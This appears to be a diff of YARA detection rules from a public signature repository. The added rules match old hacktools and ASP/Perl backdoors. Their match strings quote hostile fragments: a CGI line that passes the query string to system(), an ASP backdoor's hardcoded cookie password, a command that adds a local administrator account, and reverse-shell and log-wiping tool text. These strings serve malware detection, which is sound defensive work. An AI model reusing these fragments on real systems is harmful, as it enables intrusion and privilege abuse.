-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1489-L1506"
+		id = "19e4eca0-bd56-57af-afd2-ee2fc5c7c0df"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2279-L2299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7d8753f56fc48413fc68102cff34b6583cb0066c"
-		logic_hash = "eb0a425be0fff87eb58689a4eee4b6729e8ee985e6224790111322d4b182caf1"
-		score = 75
+		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
+		logic_hash = "4391207d66b7ed5ac2db127d3efcf22f8c2bbd0ee1f0c6982d656b91e5e10c8f"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "SHELL" ascii
-		$s2 = "PacketSendPacket" fullword ascii
-		$s3 = "ArpSniff" ascii
-		$s4 = "pcap_loop" fullword ascii
-		$s5 = "packet.dll" fullword ascii
+		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
+		$s1 = "s/%20/ /ig;" fullword ascii
+		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
+		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
+		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
+		$s6 = "$execthis = $_;" fullword ascii
+		$s7 = "system($execthis);" fullword ascii
+		$s12 = "s/%2f/\\//ig;" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 120KB and all of them
+		6 of them
 }
-rule SIGNATURE_BASE_Pw_Inspector_2 : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Asp3
 {
 	meta:
-		description = "Chinese Hacktool Set - file pw-inspector.exe"
+		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "795c7009-93a8-57c4-8554-f0ed5c1d50f8"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1508-L1524"
+		id = "ed86e829-449b-5088-a105-f1fe79547540"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2301-L2321"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf"
-		logic_hash = "7d2021ff471f03deb9e6d8b62fcb218ae3198f21fd7b8fa1fdd9b96228b8c2f8"
-		score = 75
+		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
+		logic_hash = "c62ae1d32e93a8614a8288ce2df8e26806ab67b3b133067182f0396f0f080b78"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
-		$s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii
-		$s3 = "PW-Inspector" fullword ascii
-		$s4 = "i:o:m:M:c:lunps" fullword ascii
+		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
+		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
+		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
+		$s14 = " Windows NT " fullword ascii
+		$s16 = " WIndows 2000 " fullword ascii
+		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
+		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
+		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Datpcshare : FILE
+rule SIGNATURE_BASE_Sig_238_Fpipe
 {
 	meta:
-		description = "Chinese Hacktool Set - file datPcShare.exe"
+		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1bf44c0d-6aa7-5486-baee-c17d3e82403f"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1526-L1542"
+		id = "0b2f11d9-a919-5790-8724-d2f028e4fa3a"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2323-L2341"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4"
-		logic_hash = "15297a8019192371032fc11b966d1a89d951c176da6d64e80ca5a201f55341c0"
-		score = 75
+		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
+		logic_hash = "ecf143c231aeb37cf9575c3ea8db83c9a049e85a7c95668deeac0878f9c30b9c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "PcShare.EXE" fullword wide
-		$s2 = "MZKERNEL32.DLL" fullword ascii
-		$s3 = "PcShare" fullword wide
-		$s4 = "QQ:4564405" fullword wide
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s3 = " -s    - outbound source port number" fullword ascii
+		$s5 = "http://www.foundstone.com" fullword ascii
+		$s20 = "Attempting to connect to %s port %d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Tools_Xport : FILE
+rule SIGNATURE_BASE_Sig_238_Concon
 {
 	meta:
-		description = "Chinese Hacktool Set - file xport.exe"
+		description = "Disclosed hacktool set (old stuff) - file concon.com"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3223fe5b-6135-5530-a5eb-10c44f3f6277"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1544-L1565"
+		id = "ca7862cc-1053-5fce-a569-6ecc069314df"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2343-L2356"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9584de562e7f8185f721e94ee3cceac60db26dda"
-		logic_hash = "9eea73732643f74b4802af0672f5c3ab09cc54cfecd80f8903efc26b7ceaec29"
-		score = 75
+		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
+		logic_hash = "c45955cc59970657f8787ddc0e549939d2fa30d11cfd19fd12cd9067abb3bcd6"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii
-		$s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii
-		$s3 = "%s - command line port scanner" fullword ascii
-		$s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii
-		$s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii
-		$s6 = ".\\port.ini" fullword ascii
-		$s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii
-		$s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii
-		$s9 = "http://www.xfocus.org" fullword ascii
+		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Pc_Xai : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Regdll
 {
 	meta:
-		description = "Chinese Hacktool Set - file xai.exe"
+		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcf1b57b-3616-5198-bd57-18505fee91ae"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1567-L1586"
+		id = "37096c50-68d0-5412-847a-022062a5ff2a"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2358-L2374"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f285a59fd931ce137c08bd1f0dae858cc2486491"
-		logic_hash = "80659fcf1721b20f459ac0480401bdf643c95b46118d03320bc6d4e4ee4b67f7"
-		score = 75
-		quality = 60
-		tags = "FILE"
+		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
+		logic_hash = "89606ccf4341ba9451fd1bfbc818bbcd55d45d50e06f09b9f1ecd8efb3c322af"
+		score = 60
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008  http://www.xcodez.com/" fullword wide
-		$s2 = "%SystemRoot%\\System32\\" ascii
-		$s3 = "%APPDATA%\\" ascii
-		$s4 = "---- C.Rufus Security Team ----" fullword wide
-		$s5 = "www.snzzkz.com" fullword wide
-		$s6 = "%CommonProgramFiles%\\" ascii
-		$s7 = "GetRand.dll" fullword ascii
+		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
+		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
+		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
+		$s5 = "Public Property Get oFS()" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Radmin_Hash : FILE
+rule SIGNATURE_BASE_Cleaniislog
 {
 	meta:
-		description = "Chinese Hacktool Set - file Radmin_Hash.exe"
+		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07761e81-15b4-5639-b766-8dc3f16e2b7a"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1588-L1605"
+		id = "439726c6-3262-59ef-9a54-7dcd98cf924d"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2376-L2397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b"
-		logic_hash = "d6ee13a2ed30bb44471593386521f67be0d6ccd6f8a0ebf8557012a099f81d3d"
-		score = 75
+		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
+		logic_hash = "77a26e57b36f73d4d2730bc3a4d8485718119e2ccc80b40de3515ec688616eb9"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<description>IEBars</description>" fullword ascii
-		$s2 = "PECompact2" fullword ascii
-		$s3 = "Radmin, Remote Administrator" fullword wide
-		$s4 = "Radmin 3.0 Hash " fullword wide
-		$s5 = "HASH1.0" fullword wide
+		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
+		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
+		$s8 = "CleanIISLog Ver" fullword ascii
+		$s9 = "msftpsvc" fullword ascii
+		$s10 = "Fatal Error: MFC initialization failed" fullword ascii
+		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
+		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
+		$s16 = "Service %s Stopped." fullword ascii
+		$s20 = "Process Log File %s..." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Oseditor : FILE
+rule SIGNATURE_BASE_Sqlcheck
 {
 	meta:
-		description = "Chinese Hacktool Set - file OSEditor.exe"
+		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b308852c-3436-5748-9ba6-82d4c3c5fc14"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1607-L1624"
+		id = "a72d38ef-b2e7-5051-8538-724d9e95fa6a"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2399-L2416"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d"
-		logic_hash = "6531c0b3c0f6123d9eda34ed028f05054e4805e5c329da4b29e4f37f9b5fc1b2"
-		score = 75
+		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
+		logic_hash = "e9c1d7cabe7236e059f4bfec917ca00c47a3db955746ebfcda0f5e733de359c7"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "OSEditor.exe" fullword wide
-		$s2 = "netsafe" wide
-		$s3 = "OSC Editor" fullword wide
-		$s4 = "GIF89" ascii
-		$s5 = "Unlock" ascii
+		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
+		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
+		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
+		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
+		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Goodtoolset_Ms11011 : FILE
+rule SIGNATURE_BASE_Sig_238_Runasex
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms11011.exe"
+		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "689b7ea3-6707-5f99-8232-438d903d414d"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1626-L1642"
+		id = "5fe349db-c0fc-5a49-97ee-3142f4e0e4c1"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2418-L2436"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
-		logic_hash = "99dd27eba7da44c71098446e17abfe626de91e899e28c2d2e99e7b54b9e0c825"
-		score = 75
+		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
+		logic_hash = "dac03251539028da02c9f26f20ca751ee577c125fb4f287c61ac2ea6afb1bb28"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\i386\\Hello.pdb" ascii
-		$s1 = "OS not supported." fullword ascii
-		$s3 = "Not supported." fullword wide
-		$s4 = "SystemDefaultEUDCFont" fullword wide
+		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
+		$s8 = "cmd.bat" fullword ascii
+		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
+		$s11 = "%s Execute Succussifully." fullword ascii
+		$s12 = "winsta0" fullword ascii
+		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Freeversion_Release : FILE
+rule SIGNATURE_BASE_Sig_238_Nbtdump
 {
 	meta:
-		description = "Chinese Hacktool Set - file release.exe"
+		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1a603634-a00a-5f8b-a47d-c3c8065a5c3e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1644-L1662"
+		id = "fe490f72-a07d-57c2-b9bb-d791fab10ec6"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2438-L2457"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb"
-		logic_hash = "38722afb3b955aced2e68e2048a3268722524f61784dcb45c6a695b5684230eb"
-		score = 75
+		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
+		logic_hash = "fd17851820b5036b4cc1ebb6f927bb62c898027a17b5376e9420cbfa6a166ef2"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "-->Got WMI process Pid: %d " ascii
-		$s2 = "This exploit will execute \"net user " ascii
-		$s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii
-		$s4 = "Running reverse shell" ascii
-		$s5 = "wmiprvse.exe" fullword ascii
-		$s6 = "SELECT * FROM IIsWebInfo" fullword ascii
+		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
+		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
+		$s7 = "Cerberus NBTDUMP" fullword ascii
+		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
+		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
+		$s19 = "%s's password is %s</H3>" fullword wide
+		$s20 = "%s's password is blank</H3>" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+		5 of them
 }
-rule SIGNATURE_BASE_Churrasco : FILE
+rule SIGNATURE_BASE_Sig_238_Glass2K
 {
 	meta:
-		description = "Chinese Hacktool Set - file churrasco.exe"
+		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99cb5a7a-85c1-57f5-b5b6-f0b1092e1e06"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1664-L1681"
+		id = "7a2ad37a-6b55-5710-b07d-7c289cdbb04e"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2459-L2476"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364"
-		logic_hash = "36ca7c8d1579eeb571c182c033c312b3b231313b8950c1e24eeb3df793b004c4"
-		score = 75
+		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
+		logic_hash = "d9b6b904028d67804d095f85caea5796f528f866191d3b4250055a75511f2090"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Done, command should have ran as SYSTEM!" ascii
-		$s2 = "Running command with SYSTEM Token..." ascii
-		$s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii
-		$s4 = "Found SYSTEM token 0x%x" ascii
-		$s5 = "Thread not impersonating, looking for another thread..." ascii
+		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
+		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
+		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
+		$s4 = "Glass2k.exe" fullword wide
+		$s7 = "NeoLite Executable File Compressor" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_X64_Kiwicmd : FILE
+rule SIGNATURE_BASE_Splitjoin_V1_3_3_Rar_Folder_3
 {
 	meta:
-		description = "Chinese Hacktool Set - file KiwiCmd.exe"
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "df759fd4-5d42-5dd9-81d0-ceccafcdd64d"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1682-L1697"
+		id = "4ffd7501-339c-52b7-8661-2c3ca57dfa1f"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2478-L2493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
-		logic_hash = "b49a70a49a67fbb57d643b38155482177f594bd1f01f5464c4f36b265aac48d8"
-		score = 75
+		hash = "21409117b536664a913dcd159d6f4d8758f43435"
+		logic_hash = "79eb49413cd6919e4b91e916d2612e007fd2c4da7244d9e1e3dd04d46c461d8c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
-		$s2 = "Kiwi Cmd no-gpo" fullword wide
-		$s3 = "KiwiAndCMD" fullword wide
+		$s2 = "ie686@sohu.com" fullword ascii
+		$s3 = "splitjoin.exe" fullword ascii
+		$s7 = "SplitJoin" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sql1433_SQL : FILE
+rule SIGNATURE_BASE_Aspbackdoor_EDIT
 {
 	meta:
-		description = "Chinese Hacktool Set - file SQL.exe"
+		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb4c5958-2e4e-5231-b0db-eca6bc3d823a"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1699-L1715"
+		id = "cdcec370-97af-51c0-b81a-35a788f16ef4"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2495-L2514"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "025e87deadd1c50b1021c26cb67b76b476fafd64"
-		logic_hash = "5ceecc4f345cb603a0b03180f3f09f97e5f951b5d75c469aefffe3ec62916a8f"
-		score = 75
+		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
+		logic_hash = "0f97c831eb9f257a2a6c9a677dde2ce17d529584fb7085bc94edd83d886e469f"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 }
-		$s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 }
+		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
+		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
+		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
+		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
+		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
+		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 90KB and all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Cookietools2 : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Entice
 {
 	meta:
-		description = "Chinese Hacktool Set - file CookieTools2.exe"
+		description = "Disclosed hacktool set (old stuff) - file entice.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f227ba4b-9cad-5aac-99ab-46a8237249d4"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1717-L1733"
+		id = "68c61920-9c3c-5bfe-976c-346b258bb406"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2516-L2533"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cb67797f229fdb92360319e01277e1345305eb82"
-		logic_hash = "8ddb8ea0bc047877d91f25375745ab8fa66af28b6b41de36e0fb16ea8284fce5"
-		score = 75
+		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
+		logic_hash = "c11313351565d26d9b16a2d5c3c4589676593fe633c441a1c1a33b3c134a2d56"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "www.gxgl.com&www.gxgl.net" fullword wide
-		$s2 = "ip.asp?IP=" fullword ascii
-		$s3 = "MSIE 5.5;" fullword ascii
